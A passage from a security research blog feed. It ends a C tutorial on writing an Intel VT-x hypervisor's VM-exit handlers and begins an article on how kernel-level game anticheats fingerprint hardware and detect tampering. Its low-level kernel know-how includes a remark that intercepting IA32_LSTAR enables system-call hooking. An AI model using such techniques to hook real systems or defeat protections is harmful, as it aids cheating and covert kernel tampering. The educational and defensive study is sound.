<span class="hljs-function">VOID <span class="hljs-title">VmxHandlerCpuid</span><span class="hljs-params">(PGuestContext context)</span>
</span>{
    <span class="hljs-keyword">if</span> (context-&gt;mRax == <span class="hljs-number">0x8888</span>)
    {
        context-&gt;mRax = <span class="hljs-number">0x11111111</span>;
        context-&gt;mRbx = <span class="hljs-number">0x22222222</span>;
        context-&gt;mRcx = <span class="hljs-number">0x33333333</span>;
        context-&gt;mRdx = <span class="hljs-number">0x44444444</span>;
    }
    <span class="hljs-keyword">else</span>
    {
        <span class="hljs-keyword">int</span> cpuids[<span class="hljs-number">4</span>] = {<span class="hljs-number">0</span>};
        __cpuidex(cpuids, context-&gt;mRax, context-&gt;mRcx);
        context-&gt;mRax = cpuids[<span class="hljs-number">0</span>];
        context-&gt;mRbx = cpuids[<span class="hljs-number">1</span>];
        context-&gt;mRcx = cpuids[<span class="hljs-number">2</span>];
        context-&gt;mRdx = cpuids[<span class="hljs-number">3</span>];
    }
}
</code></pre>
<p>To verify the interception of the cpuid instruction, we can use special values. If the value of rax is <code>0x8888</code>, we set <code>rax</code>, <code>rbx</code>, <code>rcx</code>, <code>rdx</code> to special values.</p>
<p>Next we need to handle the VM exits caused by <code>getsec</code>, <code>invd</code>, and <code>xsetbv</code>. The <code>getsec</code> instruction is generally not executed except when using Safer Mode Extensions (SMX). We don't need it, so we can leave it unhandled for now.</p>
<pre><code class="lang-c"><span class="hljs-comment">// Handle XSETBV instruction</span>
<span class="hljs-keyword">case</span> EXIT_REASON_XSETBV:
{
    ULONG64 value = MAKE_REG(context-&gt;mRax, context-&gt;mRdx);
    _xsetbv(context-&gt;mRcx, value);
}
<span class="hljs-keyword">break</span>;
</code></pre>
<p>For invd, simply execute an invd instruction in the host environment and return. <code>XSETBV</code> is similar: execute <code>XSETBV</code> with the guest's operands and return. Note that the instruction takes its 64-bit value split across two 32-bit registers, so you need to combine <code>eax</code> and <code>edx</code> to form the second parameter.</p>
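<p>The definition of <code>MAKE_REG</code> is not shown here, so the following is only a sketch of what such a helper presumably does: take the low 32 bits of <code>rax</code> and <code>rdx</code> and join them as EDX:EAX. The reverse split is what the <code>RDTSCP</code> handler later in this article needs. Both function names are hypothetical.</p>

```c
#include <stdint.h>

/* Join EDX:EAX into one 64-bit value, ignoring the upper halves of the
 * 64-bit guest registers. */
static uint64_t combine_edx_eax(uint64_t guest_rax, uint64_t guest_rdx)
{
    return ((guest_rdx & 0xFFFFFFFFull) << 32) | (guest_rax & 0xFFFFFFFFull);
}

/* Split a 64-bit value back into its EAX (low) and EDX (high) halves. */
static void split_edx_eax(uint64_t value, uint32_t *eax, uint32_t *edx)
{
    *eax = (uint32_t)(value & 0xFFFFFFFFull);
    *edx = (uint32_t)(value >> 32);
}
```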
<p>Next comes communication between guest and host, and closing VT. Any event that produces a VM exit can serve as a channel between the inside and the outside of the virtual machine, and we use this to implement closing VT. We stipulate that when the exit is caused by the vmcall instruction and the current rax is 'abcd', the handler exits the VT environment.</p>
<p>After closing VT, we still need to jump back to the next instruction after the vmcall instruction to continue execution. We need to directly modify <code>rsp</code> and <code>rip</code> to jump back through assembly.</p>
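<p>The check that decides whether a VM exit is a request to close VT can be sketched as follows. This is a hedged illustration, not the article's implementation: the magic value is an assumption (the ASCII bytes of 'abcd' packed into one integer), and the constant and function names are hypothetical. The basic exit reason for <code>VMCALL</code> is 18.</p>

```c
#include <stdbool.h>
#include <stdint.h>

#define SKETCH_EXIT_REASON_VMCALL 18u           /* basic exit reason for VMCALL */
#define SKETCH_VMXOFF_MAGIC       0x61626364ull /* assumed encoding of 'abcd' */

/* True when the guest executed VMCALL with the agreed magic value in rax. */
static bool is_vmxoff_request(uint16_t basic_reason, uint64_t guest_rax)
{
    return basic_reason == SKETCH_EXIT_REASON_VMCALL &&
           guest_rax == SKETCH_VMXOFF_MAGIC;
}
```

<p>Any other <code>VMCALL</code> would then fall through to the normal error path for VMX instructions in the guest.</p>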
<h1 id="heading-conditional-virtual-machine-exit-events">Conditional Virtual Machine Exit Events</h1>
<p>There are certain control fields that can cause vmexit events when executing certain instructions or reading and writing certain registers, thus we need to create special conditions and handlers for these vmexits.</p>
<p>If bit 28 of the Primary Processor-Based VM-Execution Controls ("use MSR bitmaps") is 1, MSR bitmaps are enabled. With that bit set, you provide the physical address of an MSR bitmap area in the <code>MSR_BITMAP</code> field. Once the bitmap is filled in according to the manual's rules, reading or writing the selected MSRs produces conditional VM exits.</p>
<pre><code class="lang-c"><span class="hljs-comment">// Set MSR bitmap</span>
<span class="hljs-function">BOOLEAN <span class="hljs-title">VmxSetReadMsrBitMap</span><span class="hljs-params">(PUCHAR msrBitMap, ULONG64 msrAddrIndex, BOOLEAN isEnable)</span>
</span>{
    <span class="hljs-keyword">if</span> (msrAddrIndex &gt;= <span class="hljs-number">0xC0000000</span>)
    {
        msrBitMap += <span class="hljs-number">1024</span>;
        msrAddrIndex -= <span class="hljs-number">0xC0000000</span>;
    }
    ULONG64 moveByte = <span class="hljs-number">0</span>;
    ULONG64 setBit = <span class="hljs-number">0</span>;
    <span class="hljs-keyword">if</span> (msrAddrIndex != <span class="hljs-number">0</span>)
    {
        moveByte = msrAddrIndex / <span class="hljs-number">8</span>;
        setBit = msrAddrIndex % <span class="hljs-number">8</span>;
        msrBitMap += moveByte;
    }
    <span class="hljs-keyword">if</span> (isEnable)
    {
        *msrBitMap |= <span class="hljs-number">1</span> &lt;&lt; setBit;
    }
    <span class="hljs-keyword">else</span>
    {
        *msrBitMap &amp;= ~(<span class="hljs-number">1</span> &lt;&lt; setBit);
    }
    <span class="hljs-keyword">return</span> TRUE;
}
</code></pre>
<p>The MSR bitmap area is 4KB in size, divided into four 1KB sections that control read and write access to the low (<code>0x00000000</code>-<code>0x00001FFF</code>) and high (<code>0xC0000000</code>-<code>0xC0001FFF</code>) MSR ranges. Setting up the MSR bitmap is relatively simple: set the bit for each MSR you want to intercept to 1. Additionally, you can hook system calls (in the style of an SSDT hook) by intercepting MSR <code>0xC0000082</code> (IA32_LSTAR). However, this method has poor compatibility.</p>
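<p>The function above only covers the read bitmaps. As a sketch of the full four-section layout (read-low at offset 0, read-high at 1024, write-low at 2048, write-high at 3072), the hypothetical helper below handles both reads and writes and rejects MSRs that fall outside the two ranges the bitmap covers.</p>

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Set or clear the intercept bit for one MSR in a 4KB MSR bitmap.
 * Returns false if the MSR is outside the ranges the bitmap can describe. */
static bool msr_bitmap_set(uint8_t *bitmap, uint32_t msr, bool is_write, bool intercept)
{
    size_t section;

    if (msr <= 0x1FFFu) {
        section = 0;                 /* low MSR range */
    } else if (msr >= 0xC0000000u && msr <= 0xC0001FFFu) {
        section = 1024;              /* high MSR range */
        msr -= 0xC0000000u;
    } else {
        return false;
    }
    if (is_write)
        section += 2048;             /* write bitmaps follow the read bitmaps */

    uint8_t *byte = bitmap + section + msr / 8;
    uint8_t mask = (uint8_t)(1u << (msr % 8));
    if (intercept)
        *byte |= mask;
    else
        *byte &= (uint8_t)~mask;
    return true;
}
```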
<p>Then to make VT support Windows 10, the <code>RDTSCP</code> instruction needs to be handled. If not handled, it will cause a system crash due to a #UD exception.</p>
<pre><code class="lang-c"><span class="hljs-comment">// Handle RDTSCP instruction</span>
<span class="hljs-keyword">case</span> EXIT_REASON_RDTSCP:
{
    <span class="hljs-keyword">int</span> aunx = <span class="hljs-number">0</span>;
    LARGE_INTEGER in = {<span class="hljs-number">0</span>};
    in.QuadPart = __rdtscp(&amp;aunx);
    context-&gt;mRax = in.LowPart;
    context-&gt;mRdx = in.HighPart;
    context-&gt;mRcx = aunx;
}
<span class="hljs-keyword">break</span>;
</code></pre>
<p>We need to handle every instruction that would otherwise cause a #UD exception in the guest. The Secondary Processor-Based VM-Execution Controls contain the enable bits for these instructions, and they must be set for the instructions to be usable in the guest. <code>RDTSCP</code> is an extended version of <code>RDTSC</code> available on newer processors: it reads the CPU time-stamp counter and additionally returns the value of <code>IA32_TSC_AUX</code> in <code>ecx</code>.</p>
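<p>The relevant enable bits can be sketched as plain constants. The bit positions follow the Intel manual (RDTSCP is bit 3, INVPCID is bit 12, XSAVES/XRSTORS is bit 20 of the secondary controls, and bit 31 of the primary controls activates the secondary controls); the macro and function names are hypothetical and are not the ones used elsewhere in this article.</p>

```c
#include <stdint.h>

#define SKETCH_PRIMARY_ACTIVATE_SECONDARY (1u << 31)
#define SKETCH_SECONDARY_ENABLE_RDTSCP    (1u << 3)
#define SKETCH_SECONDARY_ENABLE_INVPCID   (1u << 12)
#define SKETCH_SECONDARY_ENABLE_XSAVES    (1u << 20)

/* Secondary controls requested so the guest can use these instructions. */
static uint32_t requested_secondary_controls(void)
{
    return SKETCH_SECONDARY_ENABLE_RDTSCP |
           SKETCH_SECONDARY_ENABLE_INVPCID |
           SKETCH_SECONDARY_ENABLE_XSAVES;
}

/* The secondary controls only take effect once this primary bit is set. */
static uint32_t with_secondary_controls(uint32_t primary_controls)
{
    return primary_controls | SKETCH_PRIMARY_ACTIVATE_SECONDARY;
}
```

<p>As with the other control fields, the requested value should still be adjusted against the matching capability MSR before it is written to the VMCS, since not every CPU supports every bit.</p>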
<p>For the <code>INVPCID</code> instruction, we need to decode the information saved at VM exit and call the <code>_invpcid</code> intrinsic accordingly.</p>
<pre><code class="lang-c"><span class="hljs-function">VOID <span class="hljs-title">VmxExitInvpcidHandler</span><span class="hljs-params">(PGuestContext context)</span>
</span>{
    ULONG64 mrsp = <span class="hljs-number">0</span>;
    ULONG64 instinfo = <span class="hljs-number">0</span>;
    ULONG64 qualification = <span class="hljs-number">0</span>;
    __vmx_vmread(VMX_INSTRUCTION_INFO, &amp;instinfo); <span class="hljs-comment">// Get instruction details</span>
    __vmx_vmread(EXIT_QUALIFICATION, &amp;qualification); <span class="hljs-comment">// Get offset</span>
    __vmx_vmread(GUEST_RSP, &amp;mrsp);
    PINVPCID pinfo = (PINVPCID)&amp;instinfo;
    ULONG64 base = <span class="hljs-number">0</span>;
    ULONG64 index = <span class="hljs-number">0</span>;
    ULONG64 scale = pinfo-&gt;scale ? (<span class="hljs-number">1</span> &lt;&lt; pinfo-&gt;scale) : <span class="hljs-number">0</span>;
    ULONG64 addr = <span class="hljs-number">0</span>;
    ULONG64 regopt = ((PULONG64)context)[pinfo-&gt;regOpt];

    <span class="hljs-keyword">if</span> (!pinfo-&gt;baseInvaild)
    {
        <span class="hljs-keyword">if</span> (pinfo-&gt;base == <span class="hljs-number">4</span>)
        {
            base = mrsp;
        }
        <span class="hljs-keyword">else</span>
        {
            base = ((PULONG64)context)[pinfo-&gt;base];
        }
    }

    <span class="hljs-keyword">if</span> (!pinfo-&gt;indexInvaild)
    {
        <span class="hljs-keyword">if</span> (pinfo-&gt;index == <span class="hljs-number">4</span>)
        {
            index = mrsp;
        }
        <span class="hljs-keyword">else</span>
        {
            index = ((PULONG64)context)[pinfo-&gt;index];
        }
    }

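    <span class="hljs-comment">// Effective address of the 128-bit INVPCID descriptor in guest memory,</span>
    <span class="hljs-comment">// truncated to the address size (0 = 16-bit, 1 = 32-bit, otherwise 64-bit)</span>
    addr = base + index * scale + qualification;
    <span class="hljs-keyword">if</span> (pinfo-&gt;addrssSize == <span class="hljs-number">0</span>)
    {
        addr &amp;= <span class="hljs-number">0xFFFF</span>;
    }
    <span class="hljs-keyword">else</span> <span class="hljs-keyword">if</span> (pinfo-&gt;addrssSize == <span class="hljs-number">1</span>)
    {
        addr &amp;= <span class="hljs-number">0xFFFFFFFF</span>;
    }

    <span class="hljs-comment">// Assumes the host shares the guest's address space and a flat segment base</span>
    _invpcid((<span class="hljs-keyword">unsigned</span> <span class="hljs-keyword">int</span>)regopt, (PVOID)addr);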
}
</code></pre>
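<p>The operand address calculation is the part of this handler that is easiest to get wrong, so here it is as a standalone sketch. It assumes a flat segment base (the segment register reported in the instruction information is ignored) and takes the decoded fields as plain parameters. The function name is hypothetical.</p>

```c
#include <stdint.h>

/* Compute the linear address of a memory operand from VM-exit information.
 * scale_field:     0..3, meaning x1, x2, x4, x8
 * addr_size_field: 0 = 16-bit, 1 = 32-bit, anything else = 64-bit
 * displacement:    taken from the exit qualification */
static uint64_t operand_address(uint64_t base, uint64_t index, unsigned scale_field,
                                uint64_t displacement, unsigned addr_size_field)
{
    uint64_t addr = base + (index << (scale_field & 3u)) + displacement;

    switch (addr_size_field) {
    case 0:  return addr & 0xFFFFull;      /* wrap at 16 bits */
    case 1:  return addr & 0xFFFFFFFFull;  /* wrap at 32 bits */
    default: return addr;
    }
}
```

<p>Note that a scaling field of 0 means "multiply by one", not "ignore the index". An unused index register is signalled separately by the index-invalid bit.</p>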
<p>The <code>XSAVES</code> instruction also needs to be considered, which is used for saving processor extended states. The behavior of <code>XSAVES</code> is determined by the "enable <code>XSAVES</code>/<code>XRSTORS</code>" VM-execution control bit. If this control is not set (i.e., is 0), <code>XSAVES</code> will cause an invalid-opcode exception (#UD), potentially crashing the system.</p>
<p>When the control is set to 1, the behavior depends on the XSS-exiting bitmap. <code>XSAVES</code> will cause a VM exit if any bit is set in the logical-AND of <code>EDX:EAX</code>, the <code>IA32_XSS MSR</code>, and the XSS-exiting bitmap. Otherwise, it operates normally.</p>
<p>To properly support <code>XSAVES</code> without unnecessary performance overhead, we need to enable it in the VM-execution controls but avoid setting the XSS-exiting bitmap. This approach prevents the #UD exception and allows <code>XSAVES</code> to operate normally without causing VM exits.</p>
<pre><code class="lang-c"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">EnableXsavesSupport</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span>
</span>{
    ULONG64 secondaryControls = <span class="hljs-number">0</span>;

    <span class="hljs-comment">// Read current secondary processor-based VM-execution controls</span>
    __vmx_vmread(SECONDARY_VM_EXEC_CONTROL, &amp;secondaryControls);

    <span class="hljs-comment">// Set the XSAVES enable bit</span>
    secondaryControls |= SECONDARY_EXEC_XSAVES;

    <span class="hljs-comment">// Write back the updated controls</span>
    __vmx_vmwrite(SECONDARY_VM_EXEC_CONTROL, secondaryControls);

    <span class="hljs-comment">// Ensure XSS-exiting bitmap is not set</span>
    ULONG64 xssExitingBitmap = <span class="hljs-number">0</span>;
    __vmx_vmwrite(XSS_EXITING_BITMAP, xssExitingBitmap);
}
</code></pre>
<p>This function does two key things:</p>
<ol>
<li><p>It enables <code>XSAVES</code> support by setting the <code>SECONDARY_EXEC_XSAVES</code> bit in the secondary processor-based VM-execution controls.</p>
</li>
<li><p>It ensures the XSS-exiting bitmap is cleared, preventing unnecessary VM exits when <code>XSAVES</code> is executed.</p>
</li>
</ol>
<p>By implementing this support, we allow the guest OS (such as the Windows kernel) to use the <code>XSAVES</code> instruction without causing VM exits or exceptions. This maintains both functionality and performance in our virtualized environment.</p>
<p>It's worth noting that this approach differs from how we handle some other instructions like <code>RDTSCP</code> or <code>INVPCID</code>, where we might intentionally cause VM exits to emulate or monitor the instruction's behavior. For <code>XSAVES</code>, our goal is to allow it to execute normally within the guest, intervening as little as possible to maintain optimal performance.</p>
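<p>The <code>XSAVES</code> exit rule described above (a VM exit if any bit is set in the logical AND of <code>EDX:EAX</code>, <code>IA32_XSS</code>, and the XSS-exiting bitmap) can be written down as a one-line predicate. The function name is hypothetical, and the values are passed in as parameters rather than read from the guest or the VMCS.</p>

```c
#include <stdbool.h>
#include <stdint.h>

/* True if XSAVES with this EDX:EAX mask would cause a VM exit, assuming the
 * "enable XSAVES/XRSTORS" control is already set to 1. */
static bool xsaves_causes_exit(uint32_t eax, uint32_t edx,
                               uint64_t ia32_xss, uint64_t xss_exiting_bitmap)
{
    uint64_t instruction_mask = ((uint64_t)edx << 32) | eax;
    return (instruction_mask & ia32_xss & xss_exiting_bitmap) != 0;
}
```

<p>With the bitmap written as 0, the predicate is false for every input, which is why clearing it lets <code>XSAVES</code> run without exits.</p>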
<h1 id="heading-conclusion">Conclusion</h1>
<p>This article has covered the essential steps and concepts needed to implement a basic hypervisor using Intel VT-x virtualization technology. We've explored the process of verifying CPU support, initializing the virtual machine environment, configuring the Virtual Machine Control Structure (VMCS), and handling VM entry and exit events. The implementation of a simple hypervisor as described here provides a foundation for understanding the core mechanics of hardware-assisted virtualization.</p>
<p>There are many additional aspects that need to be addressed to create a robust and feature-complete hypervisor. These include implementing memory virtualization through Extended Page Tables (EPT), virtualizing I/O devices, handling interrupts and exceptions in the guest environment, and implementing nested virtualization support. Additionally, performance optimization, security hardening, and support for multiple guest operating systems are crucial considerations for a production-ready hypervisor.</p>
]]></content:encoded></item><item><title><![CDATA[Understanding Kernel-Level Anticheats in Online Games]]></title><description><![CDATA[Cover Illustration by atomic_arctic

This research was done using software obtained by myself individually or through open-source projects abiding to all licenses. There is no intention of harming any company’s product.
This post is not meant to be a...]]></description><link>https://research.meekolab.com/understanding-kernel-level-anticheats-in-online-games</link><guid isPermaLink="true">https://research.meekolab.com/understanding-kernel-level-anticheats-in-online-games</guid><dc:creator><![CDATA[meekochii]]></dc:creator><pubDate>Sun, 21 Jul 2024 17:00:00 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1720021643202/d0e233b5-aaa2-4ae3-a366-6ff6bf6893d7.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p><strong><em>Cover Illustration by atomic_arctic</em></strong></p>
<hr />
<p><strong>This research was done using software obtained by myself individually or through open-source projects abiding by all licenses.</strong> There is no intention of harming any company’s product.</p>
<p>This post is not meant to be an attack towards <strong>any game or anticheat developer</strong>, and I am not tied to any game hack publisher or entities.</p>
<p>Everything here is constructed for educational purposes.</p>
<hr />
</blockquote>
<p>I've talked somewhat briefly about my previous adventures as a cheat developer for various competitive games during high school. I learned a lot through those endeavors, and I've been applying those skills at work ever since. But since I got out of the game, anticheat systems have grown considerably more aggressive and the backlash against them is getting more intense.</p>
<p>On one side, developers say that kernel-level anticheat drivers are no more invasive than antivirus/EDR software. But consumers have also taken notice of how it's kinda absurd that to enjoy a game, they have to install something akin to spyware on their devices. While I do agree with some points raised by both sides, I think there is a conversation to be had about the need for these drivers.</p>
<p>On one hand, cheating software has moved on from the days of scrappy kids on UnknownCheats to a <a target="_blank" href="https://www.i3d.net/understand-cheat-developers-defeating-tactics/">massive industry</a>, with many making <a target="_blank" href="https://diablo3story.blogspot.com/2014/07/a-diablo-3-story.html">six figure incomes</a> from building cheating software. But there are also a lot of cases where <a target="_blank" href="https://research.meekolab.com/analyzing-genshin-impacts-anticheat-module">anticheat drivers</a> have been used for offensive purposes through LOLBins.</p>
<p>In this blogpost we're going to see a few things, mainly comparing Kernel-Level Anticheats to EDR/AV solutions (which is a comparison many anticheat firms make), what type of telemetry they monitor, what type of protection methods they have, and what are the alternative solutions to kernel mode anticheats.</p>
<p>This article would not be possible without:</p>
<ul>
<li><p>ItsGamerDoc's reflection on <a target="_blank" href="https://x.com/ItsGamerDoc/status/1796233961720422533">anticheats and their public perception</a></p>
</li>
<li><p>Amazing research from the following individuals</p>
<ul>
<li><p>Writeup about <a target="_blank" href="https://reversing.info/posts/guardedregions/">Valorant's Guarded Memory Regions</a> by <a target="_blank" href="https://x.com/Xyrem256">@xyrem256</a></p>
</li>
<li><p>Writeup about <a target="_blank" href="https://invlpg.dev/post/ace_screenshots/">Anti Cheat Extreme (ACE)'s Screenshotting Capabilities</a> by <a target="_blank" href="https://x.com/koyzdev">@koyzdev</a></p>
</li>
</ul>
</li>
<li><p><a target="_blank" href="https://github.com/donnaskiez/ac">ac open source anticheat</a> project on GitHub by <a target="_blank" href="https://github.com/donnaskiez"><strong>donnaskiez</strong></a></p>
</li>
<li><p>A lot of writeups about Vanguard implementations on Valorant and <a target="_blank" href="https://www.leagueoflegends.com/en-us/news/dev/dev-vanguard-x-lol/">League of Legends</a> by Riot Games</p>
</li>
<li><p><a target="_blank" href="https://www.unknowncheats.me/forum/index.php">The UnknownCheats forum</a>, lmfao</p>
</li>
</ul>
<h1 id="heading-comparing-edrs-to-anticheats">Comparing EDRs to Anticheats</h1>
<p>To be honest, this entire article came about because of a post by ItsGamerDoc on X (formerly Twitter) about anticheats and their public perception in the gaming community. He works as a Senior Anticheat Analyst at Riot Games and I've been following his work for some time, and this article of mine is in no way an attack on him or his employers.</p>
<p>The post details how the concern over kernel-level anticheats is overblown, and how they do similar things to an antivirus (which I more commonly refer to as Endpoint Detection and Response (EDR), an enterprise and more aggressive version of antivirus). At first, the comparison between EDR and anticheat systems makes sense. They're both programs that detect malicious activity against certain processes in the system, and to achieve this they both do seemingly similar things:</p>
<ul>
<li><p>Signature-based detection of known threats (usually anticheats will halt the execution of software like IDA Pro or x64dbg)</p>
</li>
<li><p>Detection and prevention of mapped drivers and DLLs (similar to the prevention of LOLBins)</p>
</li>
<li><p>Monitoring certain system binaries and processes through behavioral detection to spot malicious activity</p>
</li>
<li><p>Obfuscation of certain processes to make sure tampering is harder</p>
</li>
</ul>
<p>But there is a very fundamental difference between EDRs and anticheats that many vendors like to skip over: the adversarial nature of the relationship between the user and the software. In EDR/AVs, the users work with the security vendor to prevent a security breach and the attackers are usually external actors, but in anticheat software the user is the attacker.</p>
<p>To effectively monitor and intervene in the activities of potential cheaters, anticheats often operate at the kernel level. This allows them to intercept system calls, monitor kernel objects, and prevent tampering with user-mode processes. Kernel-level drivers can provide a higher privilege level, enabling more robust protection mechanisms such as NMI (Non-Maskable Interrupt) stack walking and direct hardware access for integrity checks.</p>
<p>Continuous verification of the integrity of the game's executable and memory space is critical. Anticheats employ techniques such as cyclic redundancy checks (CRC), hash-based verifications, and periodic integrity checks on both static and dynamic code sections. This ensures that any unauthorized modifications or injections are detected and thwarted promptly.</p>
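<p>To make the integrity-check idea concrete, here is a minimal user-mode sketch of a CRC-based check: compute a CRC-32 over a code region once, then recompute it later and compare. This is an illustration of the general technique only, not how any particular anticheat does it, and the function names are hypothetical.</p>

```c
#include <stddef.h>
#include <stdint.h>

/* Bitwise CRC-32 (reflected polynomial 0xEDB88320), no lookup table. */
static uint32_t crc32_bytes(const uint8_t *data, size_t len)
{
    uint32_t crc = 0xFFFFFFFFu;
    for (size_t i = 0; i < len; i++) {
        crc ^= data[i];
        for (int bit = 0; bit < 8; bit++) {
            uint32_t mask = 0u - (crc & 1u); /* all ones if the low bit is set */
            crc = (crc >> 1) ^ (0xEDB88320u & mask);
        }
    }
    return ~crc;
}

/* Compare a region against the checksum recorded while it was known good. */
static int region_is_intact(const uint8_t *data, size_t len, uint32_t expected_crc)
{
    return crc32_bytes(data, len) == expected_crc;
}
```

<p>A CRC is cheap but not tamper-proof, since an attacker who can patch the code can usually patch or hook the check as well. That is one reason such checks are typically run from the kernel and combined with hash-based verification.</p>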
<p>Similar to EDRs, anticheat systems also rely on behavioral analysis but with a more aggressive stance. This includes monitoring for patterns indicative of cheating, such as abnormal input rates, suspicious memory modifications, and unauthorized API calls. But this has also extended into more aggressive, spyware-like behavior.</p>
<p>Unlike EDR systems that may prioritize logging and post-event analysis, anticheat solutions require real-time intervention capabilities. This means detecting and responding to cheating attempts as they occur, often resulting in the immediate suspension or banning of the offending player. Techniques such as immediate process termination, user session invalidation, and real-time communication with game servers for coordinated responses are employed.</p>
<p>Fundamentally, the adversarial relationship between the user and anticheat systems changes the entire dynamic of how the software operates and what measures it employs. In the case of EDR systems, the security model is built on trust. The assumption is that the endpoint user is cooperating with the security measures, and the focus is on detecting, analyzing, and responding to threats that typically come from external sources. In contrast, anticheat systems operate in an inherently hostile environment. The anticheat software must assume that the user (or a subset of users) will actively attempt to circumvent its measures.</p>
<p>This article is meant to introduce people to the concept of kernel-level anticheats: how they work and what they do. While I talk a lot about anticheats like MiHoYo Protect (mhyprot.sys) and Riot Games Vanguard (vgk.sys), the discussion here about telemetry and protection methods is more of a combination of a lot of different methods I've found tinkering with different anticheat programs, public documentation, and also code from the <a target="_blank" href="https://github.com/donnaskiez/ac">ac open source anticheat</a> by <a target="_blank" href="https://github.com/donnaskiez"><strong>donnaskiez</strong></a> under the <a target="_blank" href="https://choosealicense.com/licenses/agpl-3.0/">AGPL-3.0</a>.</p>
<h1 id="heading-environment-verification-and-fingerprinting">Environment Verification and Fingerprinting</h1>
<p>Anticheats must be able to validate the environment they are running on to make sure that they are running inside of a trusted environment. This is not only to do things such as enforcing game bans, but also to detect if they are being run in a virtual machine, debugger, or sandbox, which are common tools used by cheat developers to analyze and bypass anti-cheat protections.</p>
<p>This includes the fingerprinting of the hardware that they are running on, detecting malicious PCI devices, and also detecting virtualized environments. The latter reason is why games like Valorant are unable to be run through translation layers like Crossover (Mac) or Wine (Linux).</p>
<h2 id="heading-hardware-fingerprinting-through-tpm">Hardware Fingerprinting Through TPM</h2>
<p>Extraction of hardware identifiers involves identifying and collecting unique information from the hardware components of a computer system to ensure the integrity and authenticity of the system running the software. This is crucial for anti-cheat mechanisms as it helps in uniquely identifying a machine, preventing users from easily evading bans or other restrictions by simply reinstalling the software or changing user accounts.</p>
<p>To extract hardware identifiers, the kernel-level driver interacts directly with the hardware or low-level system APIs. For instance, the driver might query the system's BIOS, CPU, motherboard, network interfaces, and other components to gather unique identifiers such as serial numbers or MAC addresses.</p>
<p>One common approach is to use the CPUID instruction to obtain the CPU's vendor, model, and other characteristics. This can be done from C with the <code>__cpuid</code> compiler intrinsic:</p>
<pre><code class="lang-cpp"><span class="hljs-function"><span class="hljs-keyword">void</span> <span class="hljs-title">get_cpu_id</span><span class="hljs-params">(<span class="hljs-keyword">char</span>* cpu_id)</span> </span>{
    <span class="hljs-keyword">int</span> cpu_info[<span class="hljs-number">4</span>] = { <span class="hljs-number">0</span> };
    __cpuid(cpu_info, <span class="hljs-number">0</span>);
    <span class="hljs-built_in">sprintf</span>(cpu_id, <span class="hljs-string">"%08X%08X%08X%08X"</span>, cpu_info[<span class="hljs-number">0</span>], cpu_info[<span class="hljs-number">1</span>], cpu_info[<span class="hljs-number">2</span>], cpu_info[<span class="hljs-number">3</span>]);
}
</code></pre>
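<p>In the code, the <code>__cpuid</code> intrinsic executes the CPUID instruction, which fills the <code>cpu_info</code> array with the values returned in EAX, EBX, ECX, and EDX. For leaf 0, as used here, those are the highest supported leaf and the vendor string, so the formatted string identifies the CPU vendor rather than a single machine. A real fingerprint would combine it with other leaves and other hardware identifiers.</p>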
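<p>To show what CPUID leaf 0 actually returns, the sketch below decodes the vendor string from the four register values in the order the intrinsic stores them (EAX, EBX, ECX, EDX). The vendor string is spread over EBX, EDX, ECX, in that order. The function name is hypothetical, and the register values are passed in so the decoding can be tried without executing CPUID.</p>

```c
#include <stdint.h>

/* Decode the 12-character vendor string from CPUID leaf 0 output.
 * regs[] is in the order EAX, EBX, ECX, EDX; out must hold 13 bytes. */
static void cpuid_vendor_string(const uint32_t regs[4], char out[13])
{
    const uint32_t order[3] = { regs[1], regs[3], regs[2] }; /* EBX, EDX, ECX */

    for (int r = 0; r < 3; r++) {
        for (int b = 0; b < 4; b++) {
            /* each register carries four ASCII bytes, lowest byte first */
            out[r * 4 + b] = (char)((order[r] >> (8 * b)) & 0xFFu);
        }
    }
    out[12] = '\0';
}
```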
<p>More aggressive anticheats, such as Riot Games' Vanguard, go further and require a TPM (Trusted Platform Module) to derive hardware-bound identifiers. A TPM lets software securely create and store cryptographic keys, and confirm that the operating system and firmware on the device are what they are supposed to be and have not been tampered with.</p>
<p>Anti-cheat systems use hardware identifiers to ensure that the machine's hardware and firmware have not been tampered with. By regularly verifying these identifiers against known values, the system can detect if any unauthorized hardware changes have been made, which might indicate an attempt to compromise the game's security.</p>
<p>Some cheats also operate by modifying hardware-level interactions, such as manipulating memory or utilizing custom drivers to alter game behavior. By monitoring hardware identifiers, the anti-cheat system can detect unusual changes or unauthorized access at the hardware level, which is often a strong indicator of cheating.</p>
<p>We first need to ensure the current platform can support TPM operations by checking the CPU type. If the TPM hardware is present, we can go ahead and determine the type of TPM interface. We can read the TPM CRB (Command Response Buffer) interface identifier and FIFO interface capability from physical memory to identify the specific type of TPM interface.</p>
<pre><code class="lang-c"><span class="hljs-function">STATIC NTSTATUS <span class="hljs-title">TpmGetPtpInterfaceType</span><span class="hljs-params">(_In_ PVOID Register, _Out_ TPM2_PTP_INTERFACE_TYPE* InterfaceType)</span> </span>{
    NTSTATUS                      status     = STATUS_UNSUCCESSFUL;
    PTP_CRB_INTERFACE_IDENTIFIER  identifier = {<span class="hljs-number">0</span>};
    PTP_FIFO_INTERFACE_CAPABILITY capability = {<span class="hljs-number">0</span>};

    *InterfaceType = <span class="hljs-number">0</span>;

    status = MapAndReadPhysical(
        (UINT64)(&amp;((PTP_CRB_REGISTERS*)Register)-&gt;InterfaceId),
        <span class="hljs-keyword">sizeof</span>(PTP_CRB_INTERFACE_IDENTIFIER),
        &amp;identifier,
        <span class="hljs-keyword">sizeof</span>(PTP_CRB_INTERFACE_IDENTIFIER));

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"MapAndReadPhysical: %x"</span>, status);
        <span class="hljs-keyword">return</span> status;
    }

    status = MapAndReadPhysical(
        (UINT64) &amp; ((PTP_FIFO_REGISTERS*)Register)-&gt;InterfaceCapability,
        <span class="hljs-keyword">sizeof</span>(PTP_FIFO_INTERFACE_CAPABILITY),
        &amp;capability,
        <span class="hljs-keyword">sizeof</span>(PTP_FIFO_INTERFACE_CAPABILITY));

    <span class="hljs-keyword">if</span> (!NT_SUCCESS(status)) {
        DEBUG_ERROR(<span class="hljs-string">"MapAndReadPhysical: %x"</span>, status);
        <span class="hljs-keyword">return</span> status;
    }

    *InterfaceType = TpmExtractInterfaceTypeFromCapabilityAndId(&amp;identifier, &amp;capability);

    <span class="hljs-keyword">return</span> status;
}
</code></pre>
